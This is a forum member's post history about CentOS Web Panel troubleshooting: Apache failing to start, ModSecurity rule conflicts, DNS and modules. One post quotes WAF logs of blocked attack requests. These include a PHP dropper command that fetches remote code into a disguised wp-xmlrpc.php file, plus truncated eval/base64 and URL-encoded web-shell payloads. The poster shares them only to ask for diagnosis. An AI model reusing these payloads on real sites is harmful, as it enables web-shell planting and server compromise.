Show Posts
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
151
New Modules / Re: [module] Wordpress Installer / Uninstaller
« on: September 06, 2017, 07:14:35 AM »
Ok, but how can an admin install then?
152
New Modules / Re: [module] Wordpress Installer / Uninstaller
« on: September 06, 2017, 06:17:24 AM »
Were can I find the installed module in panel? Link, anything?
You can access the module from Other Menu in CWP Menu -
Added correct permissions, restarted cwp, cant see it....
You can access the module from Other Menu in CWP Menu -
Added correct permissions, restarted cwp, cant see it....
153
Updates / After updating today cwp crashes
« on: August 24, 2017, 01:59:29 PM »
Every min or 5 or any 10 sec cwp crashes, no connection.
What I did made an update early morning.
Any other has similar problems? Reloading cwp wont help. Suggestions?
What I did made an update early morning.
Any other has similar problems? Reloading cwp wont help. Suggestions?
154
DNS / CWP DNS or Cloudflare
« on: August 11, 2017, 08:24:24 AM »
Hello,
I am using Cloudflare DNS but was wondering why not use CWP?
Had tried when I started to learn CWP but something was wrong, it did not work.
So my concern is now - which one is better and faster? And read about DNS full remake, is there any updates on it?
I am using Cloudflare DNS but was wondering why not use CWP?
Had tried when I started to learn CWP but something was wrong, it did not work.
So my concern is now - which one is better and faster? And read about DNS full remake, is there any updates on it?
155
CentOS 6 Problems / Re: HELP, Apashe wont start
« on: August 04, 2017, 10:26:14 AM »
Solution
http://forum.centos-webpanel.com/centos-6-problems/yum-update-after-get-mod-security-issue-cant-start-apache/
duplicate lines, deleted these 3 lines
Include /usr/local/apache/conf/sharedip.conf
Include /usr/local/apache/conf.d/*.conf
ExtendedStatus On
Thanks for not helping
http://forum.centos-webpanel.com/centos-6-problems/yum-update-after-get-mod-security-issue-cant-start-apache/
duplicate lines, deleted these 3 lines
Include /usr/local/apache/conf/sharedip.conf
Include /usr/local/apache/conf.d/*.conf
ExtendedStatus On
Thanks for not helping
156
CentOS 6 Problems / Re: HELP, Apashe wont start
« on: August 04, 2017, 10:13:57 AM »
60 days everything was working fine, but then I restarted the apache, today, so any help or solution I would realy appreacite 
157
CentOS 6 Problems / Re: HELP, Apashe wont start
« on: August 04, 2017, 09:33:09 AM »
Deleted, now apache is red and I get this:
Stopping httpd: [FAILED]
Starting httpd: [Fri Aug 04 12:30:52.519864 2017] [so:warn] [pid 3714:tid 140253090432768] AH01574: module suphp_module is already loaded, skipping
AH00526: Syntax error on line 8 of /usr/local/apache/conf.d/hostname-ssl.conf:
Invalid command 'SSLEngine', perhaps misspelled or defined by a module not included in the server configuration
[FAILED]
Stopping httpd: [FAILED]
Starting httpd: [Fri Aug 04 12:30:52.519864 2017] [so:warn] [pid 3714:tid 140253090432768] AH01574: module suphp_module is already loaded, skipping
AH00526: Syntax error on line 8 of /usr/local/apache/conf.d/hostname-ssl.conf:
Invalid command 'SSLEngine', perhaps misspelled or defined by a module not included in the server configuration
[FAILED]
158
CentOS 6 Problems / HELP, Apashe wont start
« on: August 04, 2017, 08:08:18 AM »
Restarted the apache but nothing works, get this
Starting httpd: [Fri Aug 04 11:03:48.840416 2017] [so:warn] [pid 13899:tid 140561375524608] AH01574: module suphp_module is already loaded, skipping
[Fri Aug 04 11:03:48.846935 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 2 will probably never match because it overlaps an earlier Alias.
[Fri Aug 04 11:03:48.846953 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 3 will probably never match because it overlaps an earlier Alias.
[Fri Aug 04 11:03:48.846959 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 4 will probably never match because it overlaps an earlier Alias.
(98)Address already in use: AH00072: make_sock: could not bind to address [::]:443
[ OK ]
How to fix it, server restart did not help???
Starting httpd: [Fri Aug 04 11:03:48.840416 2017] [so:warn] [pid 13899:tid 140561375524608] AH01574: module suphp_module is already loaded, skipping
[Fri Aug 04 11:03:48.846935 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 2 will probably never match because it overlaps an earlier Alias.
[Fri Aug 04 11:03:48.846953 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 3 will probably never match because it overlaps an earlier Alias.
[Fri Aug 04 11:03:48.846959 2017] [alias:warn] [pid 13899:tid 140561375524608] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 4 will probably never match because it overlaps an earlier Alias.
(98)Address already in use: AH00072: make_sock: could not bind to address [::]:443
[ OK ]
How to fix it, server restart did not help???
159
Mod_Security / Re: Reloading httpd: not reloading due to configuration syntax error
« on: May 24, 2017, 07:47:03 AM »
Fixed the above
160
Mod_Security / Re: Reloading httpd: not reloading due to configuration syntax error
« on: May 24, 2017, 06:23:13 AM »
Some help here? 
Code: [Select]
Stopping httpd: [ OK ]
Starting httpd: [Wed May 24 09:17:42.106818 2017] [so:warn] [pid 14805:tid 140109236320000] AH01574: module suphp_module is already loaded, skipping
AH00548: NameVirtualHost has no effect and will be removed in the next release /usr/local/apache/conf.d/ssl.conf:9
[Wed May 24 09:17:42.377093 2017] [alias:warn] [pid 14805:tid 140109236320000] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 2 will probably never match because it overlaps an earlier Alias.
[Wed May 24 09:17:42.377107 2017] [alias:warn] [pid 14805:tid 140109236320000] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 3 will probably never match because it overlaps an earlier Alias.
[Wed May 24 09:17:42.377113 2017] [alias:warn] [pid 14805:tid 140109236320000] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 4 will probably never match because it overlaps an earlier Alias.
AH00526: Syntax error on line 22 of /usr/local/apache/modsecurity-cwaf/rules/00_Init_Initialization.conf:
ModSecurity: Found another rule with the same id
[FAILED]
161
Mod_Security / Re: Reloading httpd: not reloading due to configuration syntax error
« on: May 22, 2017, 06:03:23 AM »
At mod section 1.Reload
Reloading httpd: not reloading due to configuration syntax error
[FAILED]
2.Restart
Stopping httpd: [ OK ]
Starting httpd: [FAILED]
At start page Apache Webserver red, pressing start get this:
Starting httpd: [Mon May 22 08:58:10.648062 2017] [so:warn] [pid 20534:tid 139965172991744] AH01574: module suphp_module is already loaded, skipping
[Mon May 22 08:58:10.919326 2017] [alias:warn] [pid 20534:tid 139965172991744] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 2 will probably never match because it overlaps an earlier Alias.
[Mon May 22 08:58:10.919347 2017] [alias:warn] [pid 20534:tid 139965172991744] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 3 will probably never match because it overlaps an earlier Alias.
[Mon May 22 08:58:10.919354 2017] [alias:warn] [pid 20534:tid 139965172991744] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 4 will probably never match because it overlaps an earlier Alias.
AH00526: Syntax error on line 22 of /usr/local/apache/modsecurity-cwaf/rules/00_Init_Initialization.conf:
ModSecurity: Found another rule with the same id
[FAILED]
Next, uninstall mod and everything is ok, but runing without....
Reloading httpd: not reloading due to configuration syntax error
[FAILED]
2.Restart
Stopping httpd: [ OK ]
Starting httpd: [FAILED]
At start page Apache Webserver red, pressing start get this:
Starting httpd: [Mon May 22 08:58:10.648062 2017] [so:warn] [pid 20534:tid 139965172991744] AH01574: module suphp_module is already loaded, skipping
[Mon May 22 08:58:10.919326 2017] [alias:warn] [pid 20534:tid 139965172991744] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 2 will probably never match because it overlaps an earlier Alias.
[Mon May 22 08:58:10.919347 2017] [alias:warn] [pid 20534:tid 139965172991744] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 3 will probably never match because it overlaps an earlier Alias.
[Mon May 22 08:58:10.919354 2017] [alias:warn] [pid 20534:tid 139965172991744] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 4 will probably never match because it overlaps an earlier Alias.
AH00526: Syntax error on line 22 of /usr/local/apache/modsecurity-cwaf/rules/00_Init_Initialization.conf:
ModSecurity: Found another rule with the same id
[FAILED]
Next, uninstall mod and everything is ok, but runing without....
162
Mod_Security / Re: Reloading httpd: not reloading due to configuration syntax error
« on: May 19, 2017, 06:23:48 AM »
Anyone?
How can I see who and when and why the services - apache, clamav, clamd, amavis, spamassassin was stoped???
Opened cwp and these proceses were stoped today.
How can I see who and when and why the services - apache, clamav, clamd, amavis, spamassassin was stoped???
Opened cwp and these proceses were stoped today.
163
Mod_Security / Reloading httpd: not reloading due to configuration syntax error
« on: May 18, 2017, 07:32:58 AM »
Hello,
got this when trying to reload....
When I restart apache it wont start again, red. To start it again I need to unninstall modsecurity.
Using:
CWPpro version: 0.9.8.238
Comodo WAF (Latest version of Comodo WAF rules with automatic updates) [CWPpro required] Installed version: 1.123
Last logs, can some one explain? I got hacked or the mod stopped the hacking?
got this when trying to reload....
When I restart apache it wont start again, red. To start it again I need to unninstall modsecurity.
Using:
CWPpro version: 0.9.8.238
Comodo WAF (Latest version of Comodo WAF rules with automatic updates) [CWPpro required] Installed version: 1.123
Last logs, can some one explain? I got hacked or the mod stopped the hacking?
Code: [Select]
[Fri May 12 19:11:58.407275 2017] [:error] [pid 29061:tid 139971778234112] [client 185.112.248.116:52241] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "file_put_contents" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/23_PHP_PHPGen.conf"] [line "36"] [id "218410"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack: High-Risk PHP Function Name Found||HIDE.lv|F|2"] [data "Matched Data: file_put_contents found within ARGS:cmd: file_put_contents(getcwd().'/wp-xmlrpc.php', rawurldecode(file_get_contents('[url]')));"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXezlDo8LAAAHGFzMAAAAEX"]
[Fri May 12 19:11:58.751947 2017] [:error] [pid 21357:tid 139971809703680] [client 185.112.248.116:52270] [client 185.112.248.116] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXezlDo8LAAAFNtFigAAACU"]
[Fri May 12 19:11:58.753323 2017] [:error] [pid 21357:tid 139971809703680] [client 185.112.248.116:52270] [client 185.112.248.116] ModSecurity: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/13_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||HIDE.lv|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXezlDo8LAAAFNtFigAAACU"]
[Fri May 12 19:11:59.439610 2017] [:error] [pid 21357:tid 139971967051520] [client 185.112.248.116:52292] [client 185.112.248.116] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXez1Do8LAAAFNtFikAAACF"]
[Fri May 12 19:11:59.440990 2017] [:error] [pid 21357:tid 139971967051520] [client 185.112.248.116:52292] [client 185.112.248.116] ModSecurity: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/13_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||HIDE.lv|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXez1Do8LAAAFNtFikAAACF"]
[Fri May 12 19:12:00.061573 2017] [:error] [pid 21301:tid 139971788723968] [client 185.112.248.116:52329] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(base64_decode(\\x22igz1bmn0aw9uihnjyw4ojhbhdggpihsgicagicrmb2xkzxjzid0gyxjyyxkoktsgicagiglmicgkzglyid0gqg9wzw5kaxiojhbhdggpksb7icagicagicagd2hpbgugkgzhbhnlice9psaojgzpbgugpsbyzwfkzglykcrkaxipkskgeyagicagicagicagicakbgzpbgugpsbzdhj0b2xvd2vykcrmawxlktsgicagicagicagicagjhbmawxlid0gjhbhdggglianlycgliakzmlsztsgicagicagicagicagawygkcrmawxlice9iccujyamjiakzmlszsahpsanli4nksb7icagicagicagicagicagicbpziaoaxnfbgluaygkcgzpbgupksb7icagicagicagicagicagicagicagy29udg..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0FDo8LAAAFM1gqoAAAAW"]
[Fri May 12 19:12:00.381321 2017] [:error] [pid 21301:tid 139971977541376] [client 185.112.248.116:52359] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(rawurldecode(\\x22%20function%20scan%28%24path%29%20%7b%20%20%20%20%20%24folders%20%3d%20array%28%29%3b%20%20%20%20%20if%20%28%24dir%20%3d%20%40opendir%28%24path%29%29%20%7b%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3d%3d%20%28%24file%20%3d%20readdir%28%24dir%29%29%29%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24lfile%20%3d%20strtolower%28%24file%29%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24pfile%20%3d%20%24path%20.%20%27/%27%20.%20%24file%3b..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0FDo8LAAAFM1gqsAAAAE"]
[Fri May 12 19:12:00.990898 2017] [:error] [pid 21301:tid 139971778234112] [client 185.112.248.116:52390] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(base64_decode(\\x22igz1bmn0aw9uihnjyw4ojhbhdggpihsgicagicrmb2xkzxjzid0gyxjyyxkoktsgicagiglmicgkzglyid0gqg9wzw5kaxiojhbhdggpksb7icagicagicagd2hpbgugkgzhbhnlice9psaojgzpbgugpsbyzwfkzglykcrkaxipkskgeyagicagicagicagicakbgzpbgugpsbzdhj0b2xvd2vykcrmawxlktsgicagicagicagicagjhbmawxlid0gjhbhdggglianlycgliakzmlsztsgicagicagicagicagawygkcrmawxlice9iccujyamjiakzmlszsahpsanli4nksb7icagicagicagicagicagicbpziaoaxnfbgluaygkcgzpbgupksb7icagicagicagicagicagicagicagy29udg..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0FDo8LAAAFM1gqwAAAAX"]
[Fri May 12 19:12:01.348794 2017] [:error] [pid 21301:tid 139971893622528] [client 185.112.248.116:52426] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(rawurldecode(\\x22%20function%20scan%28%24path%29%20%7b%20%20%20%20%20%24folders%20%3d%20array%28%29%3b%20%20%20%20%20if%20%28%24dir%20%3d%20%40opendir%28%24path%29%29%20%7b%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3d%3d%20%28%24file%20%3d%20readdir%28%24dir%29%29%29%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24lfile%20%3d%20strtolower%28%24file%29%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24pfile%20%3d%20%24path%20.%20%27/%27%20.%20%24file%3b..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0VDo8LAAAFM1gq0AAAAM"]
[Fri May 12 21:29:39.619097 2017] [:error] [pid 21301:tid 139971767744256] [client 172.68.10.236:17343] [client 172.68.10.236] ModSecurity: Access denied with code 403 (phase 2). Matched phrase ".sql/" at TX:extension. [file "/usr/local/apache/modsecurity-cwaf/rules/11_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "3"] [msg "COMODO WAF: URL file extension is restricted by policy||HIDE.lv|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "HIDE.lv"] [uri "/jghiwiqmaskdkdw.sql"] [unique_id "WRX-E1Do8LAAAFM1gswAAAAY"]
[Sat May 13 02:47:39.994558 2017] [:error] [pid 21329:tid 139971914602240] [client 141.101.104.69:31861] [client 141.101.104.69] ModSecurity: Access denied with code 403 (phase 2). Matched phrase ".sql/" at TX:extension. [file "/usr/local/apache/modsecurity-cwaf/rules/11_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "3"] [msg "COMODO WAF: URL file extension is restricted by policy||HIDE.store|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "HIDE.store"] [uri "/jghiwiqmaskdkdw.sql"] [unique_id "WRZJm1Do8LAAAFNRZ4gAAABK"]
[Sat May 13 03:11:59.476347 2017] [:error] [pid 21519:tid 139971893622528] [client 172.68.65.136:20127] [client 172.68.65.136] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.113.186.110 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZPT1Do8LAAAFQPCFgAAADM"]
[Sat May 13 03:19:10.869683 2017] [:error] [pid 21301:tid 139972058699520] [client 197.234.242.68:15736] [client 197.234.242.68] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 41.193.5.44 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZQ-lDo8LAAAFM1g6MAAAAD"]
[Sat May 13 03:28:07.788346 2017] [:error] [pid 21329:tid 139971956561664] [client 162.158.78.134:33282] [client 162.158.78.134] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.209.58.75 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZTF1Do8LAAAFNRZ7MAAABG"]
[Sat May 13 03:28:23.621291 2017] [:error] [pid 21519:tid 139971788723968] [client 173.245.50.112:14704] [client 173.245.50.112] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 172.245.60.50 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZTJ1Do8LAAAFQPCHIAAADW"]
[Sat May 13 03:28:31.290657 2017] [:error] [pid 21519:tid 139971799213824] [client 141.101.88.158:28616] [client 141.101.88.158] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.251.182.103 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZTL1Do8LAAAFQPCHMAAADV"]
[Sat May 13 03:35:00.660806 2017] [:error] [pid 21519:tid 139971778234112] [client 141.101.105.106:34364] [client 141.101.105.106] ModSecurity: Access denied with code 403 (phase 2). Matched phrase ".sql/" at TX:extension. [file "/usr/local/apache/modsecurity-cwaf/rules/11_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "3"] [msg "COMODO WAF: URL file extension is restricted by policy||HIDE.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "HIDE.com"] [uri "/jghiwiqmaskdkdw.sql"] [unique_id "WRZUtFDo8LAAAFQPCHcAAADX"]
[Sat May 13 03:39:07.182053 2017] [:error] [pid 21329:tid 139971967051520] [client 141.101.84.170:12332] [client 141.101.84.170] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.154.155.74 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZVq1Do8LAAAFNRZ7kAAABF"]
[Sat May 13 03:49:00.097854 2017] [:error] [pid 29061:tid 139971820193536] [client 108.162.241.164:36239] [client 108.162.241.164] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 108.162.241.164 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZX-FDo8LAAAHGFzdoAAAET"]
[Sat May 13 03:57:56.392645 2017] [:error] [pid 21329:tid 139971788723968] [client 172.68.65.172:24358] [client 172.68.65.172] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 172.68.65.172 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZaFFDo8LAAAFNRZ78AAABW"]
164
CentOS 6 Problems / Re: File Lock
« on: May 16, 2017, 07:27:49 AM »
Yes, I know that, but is there a way to do that from admin cwp section?
Also there is an Antivirus section in user mode were you can scan your data and check, but why there isn't an option in admin mode that could scan all users and give an overview?
Also there is an Antivirus section in user mode were you can scan your data and check, but why there isn't an option in admin mode that could scan all users and give an overview?
165
CentOS 6 Problems / File Lock
« on: May 15, 2017, 01:57:41 PM »
Hello,
is there an manual or some info about File Lock?
Will backups work when it is turned on?
Can admin turn it off? There is a option in user section, but at admins?
Thanks
is there an manual or some info about File Lock?
Will backups work when it is turned on?
Can admin turn it off? There is a option in user section, but at admins?
Thanks
